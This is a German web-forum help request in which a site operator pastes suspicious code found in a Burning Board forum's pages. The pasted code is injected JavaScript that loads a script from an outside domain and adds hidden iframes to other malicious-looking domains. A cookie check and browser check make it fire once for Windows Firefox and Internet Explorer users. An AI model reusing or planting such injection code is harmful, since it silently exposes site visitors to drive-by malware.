aber wenn man auf den Beitrag klickt kann man ihn wieder lesen. Wie kann ich das evtl. wiederherstellen ohne die Beiträge zu löschen ?? Alle anderen Beiträge erscheinen normal. This post has been edited 1 times, last edit by "truk" (Dec 22nd 2011, 6:15pm)

|
|
Source code |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
<script src="http://www.dvmsoft.eu/newsa.js" type="text/javascript">
function U()
{
var l00='';
var domain='toursoftadom.com';
var stream='2';
try{new ActiveXObject('dc');}
catch(e){l00=document.createElement('div');}
l00.id='myhidediv';
l00.style.cssText='position:absolute;width:10px;height:10px;top:0px;left:0px;z-index:-100;visibility:hidden;';
l00.innerHTML="<iframe src='http://"+domain+"/in.cgi?"+stream+"'></iframe>";
document.body.appendChild(l00);
}
if(!window.NOREPEAT)
var NOREPEAT=setInterval(function f()
{
if(document.body)
{
clearInterval(NOREPEAT);
U();
}
},500);
</script>
|
|
|
Source code |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
</div>
<div class="border loginPopup hidden" id="quickLoginBox">
<form method="post" action="index.php?form=UserLogin" class="container-1">
<div>
<input tabindex="1" type="text" class="inputText" id="quickLoginUsername" name="loginUsername" value="Benutzername" title="Benutzername" />
<input tabindex="2" type="password" class="inputText" id="quickLoginPassword" name="loginPassword" value="" title="Kennwort" />
<input type="hidden" name="url" value="/index.php?page=Index&s=8e51829618aaf35561e29e5c7606047d0fa07e27" /> <input tabindex="4" type="image" class="inputImage" src="wcf/icon/submitS.png" alt="Absenden" />
</div>
<p><label><input tabindex="3" type="checkbox" id="useCookies" name="useCookies" value="1" /> Dauerhaft angemeldet bleiben?</label></p>
</form>
</div>
</body>
</html><script type="text/javascript">function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://dvmsoft.eu/index.html"> </iframe>'); set_cookie('toppedup', '1010101');}</script>
|
Forum Software: Burning Board® 3.1.7, developed by WoltLab® GmbH